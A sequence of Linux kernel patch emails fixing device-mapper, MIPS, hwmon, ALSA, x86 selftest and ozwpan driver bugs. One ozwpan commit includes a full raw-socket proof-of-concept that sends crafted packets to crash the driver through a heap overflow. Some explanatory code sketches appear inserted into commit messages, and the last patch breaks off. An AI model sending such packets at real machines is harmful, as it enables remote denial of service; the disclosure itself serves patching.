dm_table_mq_request_based(struct dm_table *t) From 1c220c69ce0dcc0f234a9f263ad9c0864f971852 Mon Sep 17 00:00:00 2001 From: Joe Thornber Date: Fri, 29 May 2015 14:52:51 +0100 Subject: [PATCH 467/872] dm: fix casting bug in dm_merge_bvec() dm_merge_bvec() was originally added in f6fccb ("dm: introduce merge_bvec_fn"). In that commit a value in sectors is converted to bytes using << 9, and then assigned to an int. This code made assumptions about the value of BIO_MAX_SECTORS. A later commit 148e51 ("dm: improve documentation and code clarity in dm_merge_bvec") was meant to have no functional change but it removed the use of BIO_MAX_SECTORS in favor of using queue_max_sectors(). At this point the cast from sector_t to int resulted in a zero value. The fallout being dm_merge_bvec() would only allow a single page to be added to a bio. This interim fix is minimal for the benefit of stable@ because the more comprehensive cleanup of passing a sector_t to all DM targets' merge function will impact quite a few DM targets. 
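A minimal userspace sketch of the truncation, with a made-up sector count, shows why the value has to be clamped before the narrowing cast (uint64_t stands in for sector_t):

#include <stdint.h>
#include <limits.h>
#include <stdio.h>

int main(void)
{
        uint64_t max_sectors = 8388608;               /* 4 GiB in 512-byte sectors */
        uint64_t max_size = max_sectors << 9;         /* bytes, still 64-bit */

        int truncated = (int)max_size;                /* wraps to 0 on common ABIs */
        int clamped = max_size > INT_MAX ? INT_MAX : (int)max_size;

        printf("truncated=%d clamped=%d\n", truncated, clamped);
        return 0;
}

With the value stuck at zero, callers conclude that at most a single page can be merged, which is exactly the symptom described above.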
Signed-off-by: Joe Thornber Signed-off-by: Mike Snitzer Cc: stable@vger.kernel.org # 3.19+ --- drivers/md/dm.c | 17 ++++++++++++----- 1 file changed, 12 insertions(+), 5 deletions(-) diff --git a/drivers/md/dm.c b/drivers/md/dm.c index e24069aaeb18..2caf492890d6 100644 --- a/drivers/md/dm.c +++ b/drivers/md/dm.c @@ -1723,8 +1723,7 @@ static int dm_merge_bvec(struct request_queue *q, struct mapped_device *md = q->queuedata; struct dm_table *map = dm_get_live_table_fast(md); struct dm_target *ti; - sector_t max_sectors; - int max_size = 0; + sector_t max_sectors, max_size = 0; if (unlikely(!map)) goto out; @@ -1739,8 +1738,16 @@ static int dm_merge_bvec(struct request_queue *q, max_sectors = min(max_io_len(bvm->bi_sector, ti), (sector_t) queue_max_sectors(q)); max_size = (max_sectors << SECTOR_SHIFT) - bvm->bi_size; - if (unlikely(max_size < 0)) /* this shouldn't _ever_ happen */ - max_size = 0; + + /* + * FIXME: this stop-gap fix _must_ be cleaned up (by passing a sector_t + * to the targets' merge function since it holds sectors not bytes). + * Just doing this as an interim fix for stable@ because the more + * comprehensive cleanup of switching to sector_t will impact every + * DM target that implements a ->merge hook. + */ + if (max_size > INT_MAX) + max_size = INT_MAX; /* * merge_bvec_fn() returns number of bytes @@ -1748,7 +1755,7 @@ static int dm_merge_bvec(struct request_queue *q, * max is precomputed maximal io size */ if (max_size && ti->type->merge) - max_size = ti->type->merge(ti, bvm, biovec, max_size); + max_size = ti->type->merge(ti, bvm, biovec, (int) max_size); /* * If the target doesn't support merge method and some of the devices * provided their merge_bvec method (we know this by looking for the From 556b6629c10c65cee42fa893681ffdd653d097c4 Mon Sep 17 00:00:00 2001 From: Laurent Fasnacht Date: Wed, 27 May 2015 19:50:00 +0200 Subject: [PATCH 468/872] MIPS: ath79: fix build problem if CONFIG_BLK_DEV_INITRD is not set initrd_start is defined in init/do_mounts_initrd.c, which is only included in kernel if CONFIG_BLK_DEV_INITRD=y. Signed-off-by: Laurent Fasnacht Cc: linux-mips@linux-mips.org Cc: trivial@kernel.org Patchwork: https://patchwork.linux-mips.org/patch/10198/ Signed-off-by: Ralf Baechle --- arch/mips/ath79/prom.c | 3 +++ 1 file changed, 3 insertions(+) diff --git a/arch/mips/ath79/prom.c b/arch/mips/ath79/prom.c index e1fe63051136..597899ad5438 100644 --- a/arch/mips/ath79/prom.c +++ b/arch/mips/ath79/prom.c @@ -1,6 +1,7 @@ /* * Atheros AR71XX/AR724X/AR913X specific prom routines * + * Copyright (C) 2015 Laurent Fasnacht * Copyright (C) 2008-2010 Gabor Juhos * Copyright (C) 2008 Imre Kaloz * @@ -25,12 +26,14 @@ void __init prom_init(void) { fw_init_cmdline(); +#ifdef CONFIG_BLK_DEV_INITRD /* Read the initrd address from the firmware environment */ initrd_start = fw_getenvl("initrd_start"); if (initrd_start) { initrd_start = KSEG0ADDR(initrd_start); initrd_end = initrd_start + fw_getenvl("initrd_size"); } +#endif } void __init prom_free_prom_memory(void) From 57b41758230b567218cb5bc3da9068aabc496fc9 Mon Sep 17 00:00:00 2001 From: Petri Gynther Date: Tue, 26 May 2015 23:25:08 -0700 Subject: [PATCH 469/872] MIPS: BMIPS: Fix bmips_wr_vec() bmips_wr_vec() copies exception vector code from start to dst. The call to dma_cache_wback() needs to flush (end-start) bytes, starting at dst, from write-back cache to memory. 
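A rough userspace analogue of the same rule, using the compiler's cache-clearing builtin instead of the MIPS kernel helpers (install_code is a made-up name):

#include <string.h>

/* After copying code into place, cache maintenance must cover the
 * destination range: that is where the CPU will fetch instructions from,
 * so flushing the source buffer achieves nothing. */
void install_code(void *dst, const void *src, size_t len)
{
        memcpy(dst, src, len);
        __builtin___clear_cache((char *)dst, (char *)dst + len);
}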
Signed-off-by: Petri Gynther Acked-by: Florian Fainelli Reviewed-by: Kevin Cernekee Cc: linux-mips@linux-mips.org Patchwork: https://patchwork.linux-mips.org/patch/10193/ Signed-off-by: Ralf Baechle --- arch/mips/kernel/smp-bmips.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/arch/mips/kernel/smp-bmips.c b/arch/mips/kernel/smp-bmips.c index fd528d7ea278..336708ae5c5b 100644 --- a/arch/mips/kernel/smp-bmips.c +++ b/arch/mips/kernel/smp-bmips.c @@ -444,7 +444,7 @@ struct plat_smp_ops bmips5000_smp_ops = { static void bmips_wr_vec(unsigned long dst, char *start, char *end) { memcpy((void *)dst, start, end - start); - dma_cache_wback((unsigned long)start, end - start); + dma_cache_wback(dst, end - start); local_flush_icache_range(dst, dst + (end - start)); instruction_hazard(); } From c4fca4fdea940bda2cff6b844cda6af8ef1c79cc Mon Sep 17 00:00:00 2001 From: "Maciej W. Rozycki" Date: Thu, 28 May 2015 17:46:49 +0100 Subject: [PATCH 470/872] MIPS: strnlen_user.S: Fix a CPU_DADDI_WORKAROUNDS regression Correct a regression introduced with 8453eebd [MIPS: Fix strnlen_user() return value in case of overlong strings.] causing assembler warnings and broken code generated in __strnlen_kernel_nocheck_asm: arch/mips/lib/strnlen_user.S: Assembler messages: arch/mips/lib/strnlen_user.S:64: Warning: Macro instruction expanded into multiple instructions in a branch delay slot with the CPU_DADDI_WORKAROUNDS option set, resulting in the function looping indefinitely upon mounting NFS root. Use conditional assembly to avoid a microMIPS code size regression. Using $at unconditionally would cause such a regression as there are no 16-bit instruction encodings available for ALU operations using this register. Using $v1 unconditionally would produce short microMIPS encodings, but would prevent this register from being used across calls to this function. The extra LI operation introduced is free, replacing a NOP originally scheduled into the delay slot of the branch that follows. Signed-off-by: Maciej W. Rozycki Cc: linux-mips@linux-mips.org Patchwork: https://patchwork.linux-mips.org/patch/10205/ Signed-off-by: Ralf Baechle --- arch/mips/lib/strnlen_user.S | 15 +++++++++++++-- 1 file changed, 13 insertions(+), 2 deletions(-) diff --git a/arch/mips/lib/strnlen_user.S b/arch/mips/lib/strnlen_user.S index 7d12c0dded3d..77e64942f004 100644 --- a/arch/mips/lib/strnlen_user.S +++ b/arch/mips/lib/strnlen_user.S @@ -34,7 +34,12 @@ LEAF(__strnlen_\func\()_asm) FEXPORT(__strnlen_\func\()_nocheck_asm) move v0, a0 PTR_ADDU a1, a0 # stop pointer -1: beq v0, a1, 1f # limit reached? +1: +#ifdef CONFIG_CPU_DADDI_WORKAROUNDS + .set noat + li AT, 1 +#endif + beq v0, a1, 1f # limit reached? .ifeqs "\func", "kernel" EX(lb, t0, (v0), .Lfault\@) .else @@ -42,7 +47,13 @@ FEXPORT(__strnlen_\func\()_nocheck_asm) .endif .set noreorder bnez t0, 1b -1: PTR_ADDIU v0, 1 +1: +#ifndef CONFIG_CPU_DADDI_WORKAROUNDS + PTR_ADDIU v0, 1 +#else + PTR_ADDU v0, AT + .set at +#endif .set reorder PTR_SUBU v0, a0 jr ra From 8770d0898af7f0f0a8e88ce702b02a9ca326254f Mon Sep 17 00:00:00 2001 From: Pavel Machek Date: Fri, 29 May 2015 21:32:11 +0200 Subject: [PATCH 471/872] ARM: dts: Fix n900 dts file to work around 4.1 touchscreen regression on n900 Fix dts to match what the Linux kernel expects. This works around touchscreen problems in 4.1 linux on Nokia n900. 
Signed-off-by: Pavel Machek Reviewed-by: Felipe Balbi Signed-off-by: Tony Lindgren --- .../devicetree/bindings/input/touchscreen/tsc2005.txt | 4 ++-- arch/arm/boot/dts/omap3-n900.dts | 4 ++-- 2 files changed, 4 insertions(+), 4 deletions(-) diff --git a/Documentation/devicetree/bindings/input/touchscreen/tsc2005.txt b/Documentation/devicetree/bindings/input/touchscreen/tsc2005.txt index 4b641c7bf1c2..09089a6d69ed 100644 --- a/Documentation/devicetree/bindings/input/touchscreen/tsc2005.txt +++ b/Documentation/devicetree/bindings/input/touchscreen/tsc2005.txt @@ -32,8 +32,8 @@ Example: touchscreen-fuzz-x = <4>; touchscreen-fuzz-y = <7>; touchscreen-fuzz-pressure = <2>; - touchscreen-max-x = <4096>; - touchscreen-max-y = <4096>; + touchscreen-size-x = <4096>; + touchscreen-size-y = <4096>; touchscreen-max-pressure = <2048>; ti,x-plate-ohms = <280>; diff --git a/arch/arm/boot/dts/omap3-n900.dts b/arch/arm/boot/dts/omap3-n900.dts index 5c16145920ea..5f5e0f3d5b64 100644 --- a/arch/arm/boot/dts/omap3-n900.dts +++ b/arch/arm/boot/dts/omap3-n900.dts @@ -832,8 +832,8 @@ touchscreen-fuzz-x = <4>; touchscreen-fuzz-y = <7>; touchscreen-fuzz-pressure = <2>; - touchscreen-max-x = <4096>; - touchscreen-max-y = <4096>; + touchscreen-size-x = <4096>; + touchscreen-size-y = <4096>; touchscreen-max-pressure = <2048>; ti,x-plate-ohms = <280>; From 9aecac04d8d89e730ae362a748113b19c06a9d39 Mon Sep 17 00:00:00 2001 From: Guenter Roeck Date: Wed, 27 May 2015 16:11:48 -0700 Subject: [PATCH 472/872] hwmon: (tmp401) Do not auto-detect chip on I2C address 0x37 I2C address 0x37 may be used by EEPROMs, which can result in false positives. Do not attempt to detect a chip at this address. Reviewed-by: Jean Delvare Cc: stable@vger.kernel.org # v4.0+ Signed-off-by: Guenter Roeck --- Documentation/hwmon/tmp401 | 2 +- drivers/hwmon/tmp401.c | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/Documentation/hwmon/tmp401 b/Documentation/hwmon/tmp401 index 8eb88e974055..711f75e189eb 100644 --- a/Documentation/hwmon/tmp401 +++ b/Documentation/hwmon/tmp401 @@ -20,7 +20,7 @@ Supported chips: Datasheet: http://focus.ti.com/docs/prod/folders/print/tmp432.html * Texas Instruments TMP435 Prefix: 'tmp435' - Addresses scanned: I2C 0x37, 0x48 - 0x4f + Addresses scanned: I2C 0x48 - 0x4f Datasheet: http://focus.ti.com/docs/prod/folders/print/tmp435.html Authors: diff --git a/drivers/hwmon/tmp401.c b/drivers/hwmon/tmp401.c index 99664ebc738d..ccf4cffe0ee1 100644 --- a/drivers/hwmon/tmp401.c +++ b/drivers/hwmon/tmp401.c @@ -44,7 +44,7 @@ #include /* Addresses to scan */ -static const unsigned short normal_i2c[] = { 0x37, 0x48, 0x49, 0x4a, 0x4c, 0x4d, +static const unsigned short normal_i2c[] = { 0x48, 0x49, 0x4a, 0x4c, 0x4d, 0x4e, 0x4f, I2C_CLIENT_END }; enum chips { tmp401, tmp411, tmp431, tmp432, tmp435 }; From 1b63bf617206ff35b93c57c67bbe067ac735a85a Mon Sep 17 00:00:00 2001 From: Guenter Roeck Date: Thu, 28 May 2015 09:08:09 -0700 Subject: [PATCH 473/872] hwmon: (nct6775) Add missing sysfs attribute initialization The following error message is seen when loading the nct6775 driver with DEBUG_LOCK_ALLOC enabled. BUG: key ffff88040b2f0030 not in .data! ------------[ cut here ]------------ WARNING: CPU: 0 PID: 186 at kernel/locking/lockdep.c:2988 lockdep_init_map+0x469/0x630() DEBUG_LOCKS_WARN_ON(1) Caused by a missing call to sysfs_attr_init() when initializing sysfs attributes. 
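A condensed sketch of the pattern (assuming the usual hwmon includes such as <linux/hwmon-sysfs.h>; my_temp_show and create_dynamic_attr are placeholder names, not the driver's):

static ssize_t my_temp_show(struct device *dev,
                            struct device_attribute *attr, char *buf)
{
        return sprintf(buf, "%d\n", 42000);
}

static int create_dynamic_attr(struct device *dev)
{
        struct sensor_device_attribute *a;

        a = devm_kzalloc(dev, sizeof(*a), GFP_KERNEL);
        if (!a)
                return -ENOMEM;

        /* Lockdep keys must live in static storage.  A dynamically
         * allocated attribute is not, so without sysfs_attr_init()
         * assigning it a static key, lockdep complains with
         * "BUG: key ... not in .data!". */
        sysfs_attr_init(&a->dev_attr.attr);
        a->dev_attr.attr.name = "temp1_input";
        a->dev_attr.attr.mode = 0444;
        a->dev_attr.show = my_temp_show;
        a->index = 0;

        return device_create_file(dev, &a->dev_attr);
}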
Reported-by: Alexey Orishko Reviewed-by: Jean Delvare Cc: stable@vger.kernel.org # v3.12+ Signed-off-by: Guenter Roeck --- drivers/hwmon/nct6775.c | 2 ++ 1 file changed, 2 insertions(+) diff --git a/drivers/hwmon/nct6775.c b/drivers/hwmon/nct6775.c index 4fcb48103299..bd1c99deac71 100644 --- a/drivers/hwmon/nct6775.c +++ b/drivers/hwmon/nct6775.c @@ -995,6 +995,7 @@ nct6775_create_attr_group(struct device *dev, struct sensor_template_group *tg, (*t)->dev_attr.attr.name, tg->base + i); if ((*t)->s2) { a2 = &su->u.a2; + sysfs_attr_init(&a2->dev_attr.attr); a2->dev_attr.attr.name = su->name; a2->nr = (*t)->u.s.nr + i; a2->index = (*t)->u.s.index; @@ -1005,6 +1006,7 @@ nct6775_create_attr_group(struct device *dev, struct sensor_template_group *tg, *attrs = &a2->dev_attr.attr; } else { a = &su->u.a1; + sysfs_attr_init(&a->dev_attr.attr); a->dev_attr.attr.name = su->name; a->index = (*t)->u.index + i; a->dev_attr.attr.mode = From c7bd6dc320b85445b6b36a0aff41f929210027c7 Mon Sep 17 00:00:00 2001 From: Guenter Roeck Date: Thu, 28 May 2015 09:12:23 -0700 Subject: [PATCH 474/872] hwmon: (nct6683) Add missing sysfs attribute initialization The following error message is seen when loading the nct6683 driver with DEBUG_LOCK_ALLOC enabled. BUG: key ffff88040b2f0030 not in .data! ------------[ cut here ]------------ WARNING: CPU: 0 PID: 186 at kernel/locking/lockdep.c:2988 lockdep_init_map+0x469/0x630() DEBUG_LOCKS_WARN_ON(1) Caused by a missing call to sysfs_attr_init() when initializing sysfs attributes. Reported-by: Alexey Orishko Reviewed-by: Jean Delvare Cc: stable@vger.kernel.org # v3.18+ Signed-off-by: Guenter Roeck --- drivers/hwmon/nct6683.c | 2 ++ 1 file changed, 2 insertions(+) diff --git a/drivers/hwmon/nct6683.c b/drivers/hwmon/nct6683.c index f3830db02d46..37f01702d081 100644 --- a/drivers/hwmon/nct6683.c +++ b/drivers/hwmon/nct6683.c @@ -439,6 +439,7 @@ nct6683_create_attr_group(struct device *dev, struct sensor_template_group *tg, (*t)->dev_attr.attr.name, tg->base + i); if ((*t)->s2) { a2 = &su->u.a2; + sysfs_attr_init(&a2->dev_attr.attr); a2->dev_attr.attr.name = su->name; a2->nr = (*t)->u.s.nr + i; a2->index = (*t)->u.s.index; @@ -449,6 +450,7 @@ nct6683_create_attr_group(struct device *dev, struct sensor_template_group *tg, *attrs = &a2->dev_attr.attr; } else { a = &su->u.a1; + sysfs_attr_init(&a->dev_attr.attr); a->dev_attr.attr.name = su->name; a->index = (*t)->u.index + i; a->dev_attr.attr.mode = From c2affbf9a50882572e04645d5946ab0a921f061f Mon Sep 17 00:00:00 2001 From: Andy Lutomirski Date: Fri, 29 May 2015 14:58:24 -0700 Subject: [PATCH 475/872] x86/asm/entry/32, selftests: Add a selftest for kernel entries from VM86 mode Test a couple of special cases in 32-bit kernels for entries from vm86 mode. This will OOPS both old kernels due to a bug and and 4.1-rc5 due to a regression I introduced, and it should make sure that the SYSENTER-from-vm86-mode hack in the kernel keeps working. 
Signed-off-by: Andy Lutomirski Cc: Jan Beulich Cc: Linus Torvalds Cc: Peter Zijlstra Cc: Shuah Khan Cc: Thomas Gleixner Link: http://lkml.kernel.org/r/09a9916761e0a9e42d4922f147af45a0079cc1e8.1432936374.git.luto@kernel.org Tests: 394838c96013 x86/asm/entry/32: Fix user_mode() misuses Tests: 7ba554b5ac69 x86/asm/entry/32: Really make user_mode() work correctly for VM86 mode Signed-off-by: Ingo Molnar --- tools/testing/selftests/x86/Makefile | 6 +- tools/testing/selftests/x86/entry_from_vm86.c | 114 ++++++++++++++++++ 2 files changed, 118 insertions(+), 2 deletions(-) create mode 100644 tools/testing/selftests/x86/entry_from_vm86.c diff --git a/tools/testing/selftests/x86/Makefile b/tools/testing/selftests/x86/Makefile index 5bdb781163d1..9b0d8baf2934 100644 --- a/tools/testing/selftests/x86/Makefile +++ b/tools/testing/selftests/x86/Makefile @@ -5,8 +5,10 @@ include ../lib.mk .PHONY: all all_32 all_64 warn_32bit_failure clean TARGETS_C_BOTHBITS := sigreturn single_step_syscall +TARGETS_C_32BIT_ONLY := entry_from_vm86 -BINARIES_32 := $(TARGETS_C_BOTHBITS:%=%_32) +TARGETS_C_32BIT_ALL := $(TARGETS_C_BOTHBITS) $(TARGETS_C_32BIT_ONLY) +BINARIES_32 := $(TARGETS_C_32BIT_ALL:%=%_32) BINARIES_64 := $(TARGETS_C_BOTHBITS:%=%_64) CFLAGS := -O2 -g -std=gnu99 -pthread -Wall @@ -32,7 +34,7 @@ all_64: $(BINARIES_64) clean: $(RM) $(BINARIES_32) $(BINARIES_64) -$(TARGETS_C_BOTHBITS:%=%_32): %_32: %.c +$(TARGETS_C_32BIT_ALL:%=%_32): %_32: %.c $(CC) -m32 -o $@ $(CFLAGS) $(EXTRA_CFLAGS) $^ -lrt -ldl $(TARGETS_C_BOTHBITS:%=%_64): %_64: %.c diff --git a/tools/testing/selftests/x86/entry_from_vm86.c b/tools/testing/selftests/x86/entry_from_vm86.c new file mode 100644 index 000000000000..5c38a187677b --- /dev/null +++ b/tools/testing/selftests/x86/entry_from_vm86.c @@ -0,0 +1,114 @@ +/* + * entry_from_vm86.c - tests kernel entries from vm86 mode + * Copyright (c) 2014-2015 Andrew Lutomirski + * + * This exercises a few paths that need to special-case vm86 mode. + * + * GPL v2. + */ + +#define _GNU_SOURCE + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +static unsigned long load_addr = 0x10000; +static int nerrs = 0; + +asm ( + ".pushsection .rodata\n\t" + ".type vmcode_bound, @object\n\t" + "vmcode:\n\t" + "vmcode_bound:\n\t" + ".code16\n\t" + "bound %ax, (2048)\n\t" + "int3\n\t" + "vmcode_sysenter:\n\t" + "sysenter\n\t" + ".size vmcode, . 
- vmcode\n\t" + "end_vmcode:\n\t" + ".code32\n\t" + ".popsection" + ); + +extern unsigned char vmcode[], end_vmcode[]; +extern unsigned char vmcode_bound[], vmcode_sysenter[]; + +static void do_test(struct vm86plus_struct *v86, unsigned long eip, + const char *text) +{ + long ret; + + printf("[RUN]\t%s from vm86 mode\n", text); + v86->regs.eip = eip; + ret = vm86(VM86_ENTER, v86); + + if (ret == -1 && errno == ENOSYS) { + printf("[SKIP]\tvm86 not supported\n"); + return; + } + + if (VM86_TYPE(ret) == VM86_INTx) { + char trapname[32]; + int trapno = VM86_ARG(ret); + if (trapno == 13) + strcpy(trapname, "GP"); + else if (trapno == 5) + strcpy(trapname, "BR"); + else if (trapno == 14) + strcpy(trapname, "PF"); + else + sprintf(trapname, "%d", trapno); + + printf("[OK]\tExited vm86 mode due to #%s\n", trapname); + } else if (VM86_TYPE(ret) == VM86_UNKNOWN) { + printf("[OK]\tExited vm86 mode due to unhandled GP fault\n"); + } else { + printf("[OK]\tExited vm86 mode due to type %ld, arg %ld\n", + VM86_TYPE(ret), VM86_ARG(ret)); + } +} + +int main(void) +{ + struct vm86plus_struct v86; + unsigned char *addr = mmap((void *)load_addr, 4096, + PROT_READ | PROT_WRITE | PROT_EXEC, + MAP_ANONYMOUS | MAP_PRIVATE, -1,0); + if (addr != (unsigned char *)load_addr) + err(1, "mmap"); + + memcpy(addr, vmcode, end_vmcode - vmcode); + addr[2048] = 2; + addr[2050] = 3; + + memset(&v86, 0, sizeof(v86)); + + v86.regs.cs = load_addr / 16; + v86.regs.ss = load_addr / 16; + v86.regs.ds = load_addr / 16; + v86.regs.es = load_addr / 16; + + assert((v86.regs.cs & 3) == 0); /* Looks like RPL = 0 */ + + /* #BR -- should deliver SIG??? */ + do_test(&v86, vmcode_bound - vmcode, "#BR"); + + /* SYSENTER -- should cause #GP or #UD depending on CPU */ + do_test(&v86, vmcode_sysenter - vmcode, "SYSENTER"); + + return (nerrs == 0 ? 0 : 1); +} From 2f80b2958abe5658000d5ad9b45a36ecf879666e Mon Sep 17 00:00:00 2001 From: Eric Wong Date: Sat, 30 May 2015 09:15:39 +0000 Subject: [PATCH 476/872] ALSA: usb-audio: don't try to get Outlaw RR2150 sample rate This quirk allows us to avoid the noisy: current rate 0 is different from the runtime rate message every time playback starts. While USB DAC in the RR2150 supports reading the sample rate, it never returns a sample rate other than zero in my observation with common sample rates. Signed-off-by: Eric Wong Cc: Joe Turner Cc: Signed-off-by: Takashi Iwai --- sound/usb/quirks.c | 1 + 1 file changed, 1 insertion(+) diff --git a/sound/usb/quirks.c b/sound/usb/quirks.c index 29175346cc4f..b8c97d092a47 100644 --- a/sound/usb/quirks.c +++ b/sound/usb/quirks.c @@ -1120,6 +1120,7 @@ bool snd_usb_get_sample_rate_quirk(struct snd_usb_audio *chip) case USB_ID(0x045E, 0x0772): /* MS Lifecam Studio */ case USB_ID(0x045E, 0x0779): /* MS Lifecam HD-3000 */ case USB_ID(0x04D8, 0xFEEA): /* Benchmark DAC1 Pre */ + case USB_ID(0x074D, 0x3553): /* Outlaw RR2150 (Micronas UAC3553B) */ return true; } return false; From d114b9fe78c8d6fc6e70808c2092aa307c36dc8e Mon Sep 17 00:00:00 2001 From: "Jason A. Donenfeld" Date: Fri, 29 May 2015 13:06:58 +0200 Subject: [PATCH 477/872] ozwpan: Use proper check to prevent heap overflow Since elt->length is a u8, we can make this variable a u8. Then we can do proper bounds checking more easily. Without this, a potentially negative value is passed to the memcpy inside oz_hcd_get_desc_cnf, resulting in a remotely exploitable heap overflow with network supplied data. This could result in remote code execution. A PoC which obtains DoS follows below. 
It requires the ozprotocol.h file from this module. =-=-=-=-=-= #include #include #include #include #include #include #include #include #include #include #define u8 uint8_t #define u16 uint16_t #define u32 uint32_t #define __packed __attribute__((__packed__)) #include "ozprotocol.h" static int hex2num(char c) { if (c >= '0' && c <= '9') return c - '0'; if (c >= 'a' && c <= 'f') return c - 'a' + 10; if (c >= 'A' && c <= 'F') return c - 'A' + 10; return -1; } static int hwaddr_aton(const char *txt, uint8_t *addr) { int i; for (i = 0; i < 6; i++) { int a, b; a = hex2num(*txt++); if (a < 0) return -1; b = hex2num(*txt++); if (b < 0) return -1; *addr++ = (a << 4) | b; if (i < 5 && *txt++ != ':') return -1; } return 0; } int main(int argc, char *argv[]) { if (argc < 3) { fprintf(stderr, "Usage: %s interface destination_mac\n", argv[0]); return 1; } uint8_t dest_mac[6]; if (hwaddr_aton(argv[2], dest_mac)) { fprintf(stderr, "Invalid mac address.\n"); return 1; } int sockfd = socket(AF_PACKET, SOCK_RAW, IPPROTO_RAW); if (sockfd < 0) { perror("socket"); return 1; } struct ifreq if_idx; int interface_index; strncpy(if_idx.ifr_ifrn.ifrn_name, argv[1], IFNAMSIZ - 1); if (ioctl(sockfd, SIOCGIFINDEX, &if_idx) < 0) { perror("SIOCGIFINDEX"); return 1; } interface_index = if_idx.ifr_ifindex; if (ioctl(sockfd, SIOCGIFHWADDR, &if_idx) < 0) { perror("SIOCGIFHWADDR"); return 1; } uint8_t *src_mac = (uint8_t *)&if_idx.ifr_hwaddr.sa_data; struct { struct ether_header ether_header; struct oz_hdr oz_hdr; struct oz_elt oz_elt; struct oz_elt_connect_req oz_elt_connect_req; } __packed connect_packet = { .ether_header = { .ether_type = htons(OZ_ETHERTYPE), .ether_shost = { src_mac[0], src_mac[1], src_mac[2], src_mac[3], src_mac[4], src_mac[5] }, .ether_dhost = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] } }, .oz_hdr = { .control = OZ_F_ACK_REQUESTED | (OZ_PROTOCOL_VERSION << OZ_VERSION_SHIFT), .last_pkt_num = 0, .pkt_num = htole32(0) }, .oz_elt = { .type = OZ_ELT_CONNECT_REQ, .length = sizeof(struct oz_elt_connect_req) }, .oz_elt_connect_req = { .mode = 0, .resv1 = {0}, .pd_info = 0, .session_id = 0, .presleep = 35, .ms_isoc_latency = 0, .host_vendor = 0, .keep_alive = 0, .apps = htole16((1 << OZ_APPID_USB) | 0x1), .max_len_div16 = 0, .ms_per_isoc = 0, .up_audio_buf = 0, .ms_per_elt = 0 } }; struct { struct ether_header ether_header; struct oz_hdr oz_hdr; struct oz_elt oz_elt; struct oz_get_desc_rsp oz_get_desc_rsp; } __packed pwn_packet = { .ether_header = { .ether_type = htons(OZ_ETHERTYPE), .ether_shost = { src_mac[0], src_mac[1], src_mac[2], src_mac[3], src_mac[4], src_mac[5] }, .ether_dhost = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] } }, .oz_hdr = { .control = OZ_F_ACK_REQUESTED | (OZ_PROTOCOL_VERSION << OZ_VERSION_SHIFT), .last_pkt_num = 0, .pkt_num = htole32(1) }, .oz_elt = { .type = OZ_ELT_APP_DATA, .length = sizeof(struct oz_get_desc_rsp) - 2 }, .oz_get_desc_rsp = { .app_id = OZ_APPID_USB, .elt_seq_num = 0, .type = OZ_GET_DESC_RSP, .req_id = 0, .offset = htole16(0), .total_size = htole16(0), .rcode = 0, .data = {0} } }; struct sockaddr_ll socket_address = { .sll_ifindex = interface_index, .sll_halen = ETH_ALEN, .sll_addr = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] } }; if (sendto(sockfd, &connect_packet, sizeof(connect_packet), 0, (struct sockaddr *)&socket_address, sizeof(socket_address)) < 0) { perror("sendto"); return 1; } usleep(300000); if (sendto(sockfd, &pwn_packet, sizeof(pwn_packet), 0, 
(struct sockaddr *)&socket_address, sizeof(socket_address)) < 0) { perror("sendto"); return 1; } return 0; } Signed-off-by: Jason A. Donenfeld Acked-by: Dan Carpenter Cc: stable Signed-off-by: Greg Kroah-Hartman --- drivers/staging/ozwpan/ozusbsvc1.c | 13 +++++++++---- 1 file changed, 9 insertions(+), 4 deletions(-) diff --git a/drivers/staging/ozwpan/ozusbsvc1.c b/drivers/staging/ozwpan/ozusbsvc1.c index d434d8c6fff6..b573ad3e9674 100644 --- a/drivers/staging/ozwpan/ozusbsvc1.c +++ b/drivers/staging/ozwpan/ozusbsvc1.c @@ -390,10 +390,15 @@ void oz_usb_rx(struct oz_pd *pd, struct oz_elt *elt) case OZ_GET_DESC_RSP: { struct oz_get_desc_rsp *body = (struct oz_get_desc_rsp *)usb_hdr; - int data_len = elt->length - - sizeof(struct oz_get_desc_rsp) + 1; - u16 offs = le16_to_cpu(get_unaligned(&body->offset)); - u16 total_size = + u16 offs, total_size; + u8 data_len; + + if (elt->length < sizeof(struct oz_get_desc_rsp) - 1) + break; + data_len = elt->length - + (sizeof(struct oz_get_desc_rsp) - 1); + offs = le16_to_cpu(get_unaligned(&body->offset)); + total_size = le16_to_cpu(get_unaligned(&body->total_size)); oz_dbg(ON, "USB_REQ_GET_DESCRIPTOR - cnf\n"); oz_hcd_get_desc_cnf(usb_ctx->hport, body->req_id, From b1bb5b49373b61bf9d2c73a4d30058ba6f069e4c Mon Sep 17 00:00:00 2001 From: "Jason A. Donenfeld" Date: Fri, 29 May 2015 13:06:59 +0200 Subject: [PATCH 478/872] ozwpan: Use unsigned ints to prevent heap overflow Using signed integers, the subtraction between required_size and offset could wind up being negative, resulting in a memcpy into a heap buffer with a negative length, resulting in huge amounts of network-supplied data being copied into the heap, which could potentially lead to remote code execution.. This is remotely triggerable with a magic packet. A PoC which obtains DoS follows below. It requires the ozprotocol.h file from this module. 
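Before the PoC, a minimal sketch of the unsigned, bounds-checked length computation (the function and field names are stand-ins, not the driver's):

#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* offset and total arrive from the network and must not be trusted. */
size_t safe_copy_len(size_t buf_size, uint16_t offset, uint16_t total)
{
        size_t required = buf_size;

        if (required > total)
                required = total;
        if (offset >= required)               /* nothing left to copy */
                return 0;
        return required - offset;             /* cannot underflow after the check */
}

int main(void)
{
        char buf[64];

        /* offset beyond the end: a signed subtraction would go negative
         * and, converted to memcpy's size_t, turn into a huge length. */
        size_t n = safe_copy_len(sizeof(buf), 100, 10);
        printf("copy %zu bytes\n", n);         /* prints "copy 0 bytes" */
        memset(buf, 0, n);
        return 0;
}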
